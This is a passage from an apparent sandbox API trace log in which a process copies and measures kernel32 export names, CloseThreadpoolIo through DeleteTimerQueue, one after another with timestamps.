lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.346] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.346] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.346] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.346] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.346] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.347] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.347] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.347] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.347] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.347] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.347] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.347] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.347] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.347] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.347] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.347] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.347] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.347] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.347] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.347] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.347] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.347] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.347] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.348] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.348] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.348] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.348] lstrlenA (lpString="COPYFILEA") returned 9 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.348] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.348] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.348] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.348] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.348] lstrlenA (lpString="COPYFILEW") returned 9 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.348] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.348] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.348] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.348] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.348] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.348] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.348] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.348] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.348] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.348] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.349] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.349] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.349] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.349] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.349] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.349] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.349] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.349] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.349] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.349] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.349] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.349] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.349] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.349] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.349] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.349] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.349] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.349] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.349] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.350] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.350] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.350] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.350] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.350] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.350] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.350] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.350] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.350] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.350] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.350] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.350] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.350] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.350] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.350] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.350] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.350] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.350] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.350] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.350] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.351] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.351] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.351] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.351] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.351] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.351] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.351] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.351] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.351] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.351] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.351] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.351] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.351] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.351] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.351] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.351] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.351] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.351] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.351] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.352] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.352] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.352] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.352] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.352] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.352] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.352] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.352] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.352] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.352] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.352] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.352] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.352] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.352] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.352] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.352] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.352] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.352] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.352] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.353] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.353] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.353] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.353] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.353] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.353] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.353] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.353] lstrlenA (lpString="DELETEATOM") returned 10 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.353] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.353] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.353] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.353] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.353] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.353] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.353] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.353] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.382] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.382] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" 